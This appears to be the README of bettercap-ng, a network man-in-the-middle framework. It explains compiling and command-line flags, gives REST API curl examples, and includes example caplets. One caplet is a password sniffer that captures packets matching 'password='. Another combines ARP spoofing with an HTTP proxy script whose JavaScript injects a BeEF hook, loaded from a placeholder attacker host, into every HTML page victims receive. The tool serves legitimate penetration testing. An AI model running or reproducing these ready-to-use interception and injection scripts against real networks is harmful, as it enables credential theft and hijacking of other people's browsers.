| caplets | ||
| core | ||
| firewall | ||
| log | ||
| modules | ||
| net | ||
| packets | ||
| session | ||
| tls | ||
| .gitignore | ||
| .travis.yml | ||
| LICENSE.md | ||
| main.go | ||
| Makefile | ||
| README.md | ||
bettercap-ng
This is a WIP of the new version of bettercap, very alpha, do not use ... or do, whatever.
Compiling
Make sure you have a correctly configured Go >= 1.8 environment and the libpcap-dev package installed for your system, then:
git clone https://github.com/evilsocket/bettercap-ng $GOPATH/src/github.com/evilsocket/bettercap-ng
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
make deps
make
To show the command line options:
# sudo ./bettercap-ng -h
Usage of ./bettercap-ng:
-caplet string
Read commands from this file and execute them in the interactive session.
-debug
Print debug messages.
-eval string
Run a command, used to set variables via command line.
-iface string
Network interface to bind to.
-no-history
Disable history file.
-silent
Suppress all logs which are not errors.
Caplets
Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.
caplets/simple-password-sniffer.cap
Simple password sniffer.
# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on
caplets/rest-api.cap
Start a rest API.
# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082
# actively probe network for new hosts
net.probe on
net.recon on
# enjoy /api/session and /api/events
api.rest on
Get information about the current session:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session
Execute a command in the current interactive session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
Get last 50 events:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50
Clear events:
curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events
caplets/beef-inject.cap
Use a proxy script to inject a BEEF javascript hook:
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"
# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
The caplets/beef.inject.js proxy script file:
function onLoad() {
console.log( "BeefInject loaded." );
console.log("targets: " + env['arp.spoof.targets']);
}
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>'
);
res.Updated();
}
}
}
Interactive Mode
Interactive mode allows you to start and stop modules manually on the fly, change options and apply new firewall rules on the fly, to show the help menu type help, you can have module specific help by using help module-name.
License
bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they're released under the GPL 3 license.